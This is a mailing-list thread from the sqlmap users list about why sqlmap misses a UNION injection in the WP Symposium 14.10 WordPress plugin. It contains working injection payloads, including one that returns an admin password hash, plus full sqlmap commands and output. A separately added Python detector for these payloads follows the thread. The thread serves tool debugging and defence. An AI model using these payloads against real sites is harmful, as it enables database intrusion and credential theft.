Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it
From: Brandon P. <bpe...@gm...> - 2014-12-15 21:23:11
Yeah, no worries. Was just playing around with it and was surprised sqlmap didn't find the UNION. I think what is happening is sqlmap is changing up the value of tray during the union tests to negative numbers, and it is required to be 'in_deleted' (but hey, that's what --prefix is for). Thanks!

On Mon, Dec 15, 2014 at 2:39 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> Looking into the traffic file I don't see "obvious" trails of SQLi. If you are satisfied with your findings I won't look any further.
>
> Bye
>
> On Mon, Dec 15, 2014 at 6:55 PM, Brandon Perry <bpe...@gm...> wrote:
>>
>> Aha, I got it:
>>
>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --prefix='in_deleted ' --level=5 --risk=3 -o
>>          _
>>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
>> |_ -| . |       | .'| . |
>> |___|_  |_|_|_|_|__,|  _|
>>       |_|            |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 09:54:50
>>
>> [09:54:50] [INFO] parsing HTTP request from '/tmp/req.req'
>> [09:54:50] [INFO] setting file for logging HTTP traffic
>> [09:54:50] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
>> [09:54:50] [INFO] testing connection to the target URL
>> [09:54:50] [INFO] heuristics detected web page charset 'ascii'
>> [09:54:50] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
>> [09:54:50] [INFO] testing for SQL injection on POST parameter 'tray'
>> [09:54:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
>> [09:54:51] [WARNING] reflective value(s) found and filtering out
>> [09:54:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
>> [09:54:51] [INFO] target URL appears to be UNION injectable with 1 columns
>> [09:54:51] [INFO] POST parameter 'tray' is 'MySQL UNION query (random number) - 1 to 10 columns' injectable
>> POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
>> sqlmap identified the following injection points with a total of 26 HTTP(s) requests:
>> ---
>> Parameter: tray (POST)
>>     Type: UNION query
>>     Title: MySQL UNION query (random number) - 1 column
>>     Payload: action=getMailMessage&tray=in_deleted UNION ALL SELECT CONCAT(0x71786b7171,0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1
>> ---
>> [09:55:02] [INFO] testing MySQL
>> [09:55:02] [INFO] confirming MySQL
>> [09:55:03] [INFO] the back-end DBMS is MySQL
>> web server operating system: Linux Ubuntu
>> web application technology: Apache 2.4.7, PHP 5.5.9
>> back-end DBMS: MySQL >= 5.0.0
>> [09:55:03] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'
>>
>> [*] shutting down at 09:55:03
>>
>> bperry@ubuntu:~/tools/sqlmap$
>>
>>
>> On Mon, Dec 15, 2014 at 11:46 AM, Brandon Perry <bpe...@gm...> wrote:
>>>
>>> Sorry, one more thing to note, the following command gets very close to exploiting the injection:
>>>
>>> ./sqlmap.py -r /tmp/req.req -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt --proxy=http://127.0.0.1:8080 --technique=u --suffix=" LIMIT 1,1#" --union-char=f --prefix='in_deleted '
>>>
>>> The only problem is that the union-char is 'f', when I was hoping it would be 0x66. When I capture the request and replace 'f' with 0x66, the injection works. Looks like ' is a bad char.
>>>
>>> On Mon, Dec 15, 2014 at 11:29 AM, Brandon Perry <bpe...@gm...> wrote:
>>>>
>>>> Playing with the queries sqlmap sends a bit more:
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT NULL#&mid=1
>>>>
>>>> This results in a 0 being returned where the password hash was in the successful injection:
>>>>
>>>> 1[split]0[split]in_deleted UNION ALL SELECT NULL#[split]
>>>>         ^ injection result
>>>>
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361#&mid=1
>>>>
>>>> This payload also results in a 0 being returned, not 'fdsa' as you would expect.
>>>>
>>>> However, this payload does return 'fdsa':
>>>>
>>>> action=getMailMessage&tray=in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#&mid=1
>>>>
>>>> 1[split]fdsa[split]in_deleted UNION ALL SELECT 0x66647361 LIMIT 1,1#[split]
>>>>
>>>>
>>>> Hope this helps.
>>>>
>>>>
>>>> On Mon, Dec 15, 2014 at 11:01 AM, Brandon Perry <bpe...@gm...> wrote:
>>>>>
>>>>> Here is the console output. Attached is the traffic log in a zip:
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=mysql -p tray --flush-session -t /tmp/traffic.txt
>>>>>          _
>>>>>  ___ ___| |_____ ___ ___  {1.0-dev-180ede0}
>>>>> |_ -| . |       | .'| . |
>>>>> |___|_  |_|_|_|_|__,|  _|
>>>>>       |_|            |_|   http://sqlmap.org
>>>>>
>>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>>>>
>>>>> [*] starting at 08:56:27
>>>>>
>>>>> [08:56:27] [INFO] parsing HTTP request from '/tmp/req.req'
>>>>> [08:56:27] [INFO] setting file for logging HTTP traffic
>>>>> [08:56:27] [INFO] flushing session file
>>>>> [08:56:27] [INFO] testing connection to the target URL
>>>>> [08:56:27] [INFO] heuristics detected web page charset 'ascii'
>>>>> [08:56:27] [INFO] testing if the target URL is stable. This can take a couple of seconds
>>>>> [08:56:28] [INFO] target URL is stable
>>>>> [08:56:28] [WARNING] heuristic (basic) test shows that POST parameter 'tray' might not be injectable
>>>>> [08:56:28] [INFO] testing for SQL injection on POST parameter 'tray'
>>>>> [08:56:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>>>>> [08:56:28] [WARNING] reflective value(s) found and filtering out
>>>>> [08:56:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>>> [08:56:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>>> [08:56:59] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
>>>>> [08:57:05] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
>>>>> [08:57:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
>>>>> [08:57:18] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)'
>>>>> [08:57:28] [INFO] testing 'Generic boolean-based blind - Parameter replace (original value)'
>>>>> [08:57:28] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
>>>>> [08:57:29] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (original value)'
>>>>> [08:57:29] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses'
>>>>> [08:57:30] [INFO] testing 'Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)'
>>>>> [08:57:30] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses'
>>>>> [08:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
>>>>> [08:57:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
>>>>> [08:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:57:45] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
>>>>> [08:57:48] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
>>>>> [08:57:51] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)'
>>>>> [08:57:55] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)'
>>>>> [08:57:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
>>>>> [08:58:01] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'
>>>>> [08:58:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (EXTRACTVALUE)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clauses (UPDATEXML)'
>>>>> [08:58:08] [INFO] testing 'MySQL >= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)'
>>>>> [08:58:08] [INFO] testing 'MySQL inline queries'
>>>>> [08:58:08] [INFO] testing 'MySQL > 5.0.11 stacked queries'
>>>>> [08:58:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
>>>>> [08:58:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
>>>>> [08:58:18] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
>>>>> [08:58:22] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
>>>>> [08:58:26] [INFO] POST parameter 'tray' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
>>>>> [08:58:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
>>>>> [08:58:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
>>>>> [08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
>>>>> [08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
>>>>> [08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
>>>>> [08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
>>>>> [08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
>>>>> [08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
>>>>> [08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
>>>>> [08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
>>>>> [08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
>>>>> [08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns'
>>>>> [08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
>>>>> [08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
>>>>> [08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
>>>>> [08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
>>>>> [08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
>>>>> [08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
>>>>> [08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
>>>>> [08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
>>>>> [08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
>>>>> [08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
>>>>> [08:58:54] [INFO] checking if the injection point on POST parameter 'tray' is a false positive
>>>>> POST parameter 'tray' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
>>>>> sqlmap identified the following injection points with a total of 2049 HTTP(s) requests:
>>>>> ---
>>>>> Parameter: tray (POST)
>>>>>     Type: AND/OR time-based blind
>>>>>     Title: MySQL < 5.0.12 AND time-based blind (heavy query)
>>>>>     Payload: action=getMailMessage&tray=in_deleted AND 9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
>>>>> ---
>>>>> [08:59:48] [INFO] testing MySQL
>>>>> [08:59:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
>>>>> do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
>>>>> [08:59:51] [INFO] confirming MySQL
>>>>> [08:59:53] [INFO] adjusting time delay to 1 second due to good response times
>>>>> [08:59:53] [INFO] the back-end DBMS is MySQL
>>>>> web server operating system: Linux Ubuntu
>>>>> web application technology: Apache 2.4.7, PHP 5.5.9
>>>>> back-end DBMS: MySQL >= 5.0.0
>>>>> [08:59:53] [INFO] fetched data logged to text files under '/home/bperry/.sqlmap/output/172.31.16.26'
>>>>>
>>>>> [*] shutting down at 08:59:53
>>>>>
>>>>> bperry@ubuntu:~/tools/sqlmap$
>>>>>
>>>>> On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>
>>>>>> Hi.
>>>>>>
>>>>>> I don't see a reason why this form of UNION test would be any different from the regular one used by sqlmap. Can you please send me the traffic file for such a run (... --flush-session -t traffic.txt) along with the console output?
>>>>>>
>>>>>> Bye
>>>>>> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:
>>>>>>
>>>>>>> Hello!
>>>>>>>
>>>>>>> Playing around with the following vulnerability:
>>>>>>>
>>>>>>> http://www.exploit-db.com/exploits/35505/
>>>>>>>
>>>>>>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does result in a response from the server with the hash of the first user:
>>>>>>>
>>>>>>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>>>>>>
>>>>>>> However, sqlmap only finds a time-based injection. Looking at sqlmap through burp, I do see sqlmap doesn't try an injection syntax like the one used in the PoC. It may be useful to add a syntax of UNION (SELECT CONCAT(blah, blah, blah) FROM blah).
>>>>>>>
>>>>>>> Just a thought!
>>>>>>>
>>>>>>> --
>>>>>>> http://volatile-minds.blogspot.com -- blog
>>>>>>> http://www.volatileminds.net -- website
>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> sqlmap-users mailing list
>>>>>>> sql...@li...
>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
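A defender-side view of the same payloads, as an added example that is not code from this thread, from sqlmap or from WP Symposium: the request bodies quoted above are embedded as constructed samples, and the check enforces the whitelist the `tray` parameter should have had (the thread only ever shows `in_deleted`, so that one-entry whitelist is an assumption) and names which of the observed patterns (UNION ... SELECT, long hex literals, BENCHMARK(), a trailing comment) each sample carries, for a detection log.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies, modelled on the payloads quoted in the thread:
# the benign request, the PoC from the advisory, sqlmap's UNION payload with
# hex-encoded markers, and sqlmap's BENCHMARK() heavy-query payload.
SAMPLE_BODIES = [
    "action=getMailMessage&tray=in_deleted&mid=1",
    "action=getMailMessage&tray=in_deleted = 1 UNION (SELECT user_pass FROM "
    "wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1",
    "action=getMailMessage&tray=in_deleted UNION ALL SELECT CONCAT(0x71786b7171,"
    "0x756a6c48694a6a504545,0x71767a6a71) LIMIT 1,1#&mid=1",
    "action=getMailMessage&tray=in_deleted AND 9095=BENCHMARK(5000000,"
    "MD5(0x6e434246))-- QPnA&mid=1",
]

# Assumption: the application only expects a fixed set of tray names; the
# thread shows 'in_deleted', so that is the whole whitelist here.
ALLOWED_TRAYS = {"in_deleted"}

# Patterns taken from the payloads above: UNION with an optional ALL or opening
# parenthesis before SELECT, long hex literals (how sqlmap avoids quotes, which
# the thread found to be a bad char), BENCHMARK()/SLEEP() timing tricks, and a
# trailing comment that discards the rest of the original query.
SIGNATURES = {
    "union_select": re.compile(r"\bUNION\b(?:\s+ALL)?\s*\(?\s*SELECT\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{6,}\b", re.I),
    "time_based": re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.I),
    "comment_tail": re.compile(r"(?:--\s|#)"),
}


def analyse_body(body):
    """Return (verdict, findings) for one POST body.

    The whitelist check alone blocks every malicious sample; the signature
    names are extra detail worth recording in a detection log.
    """
    findings = []
    for tray in parse_qs(body, keep_blank_values=True).get("tray", []):
        if tray not in ALLOWED_TRAYS:
            findings.append("tray not in whitelist")
        findings.extend(name for name, rx in SIGNATURES.items() if rx.search(tray))
    return ("block" if findings else "allow"), findings


def analyse_all(bodies=SAMPLE_BODIES):
    """Run analyse_body over a batch of bodies, preserving order."""
    return [analyse_body(b) for b in bodies]


if __name__ == "__main__":
    for body, (verdict, findings) in zip(SAMPLE_BODIES, analyse_all()):
        print(verdict, findings, body[:60])
```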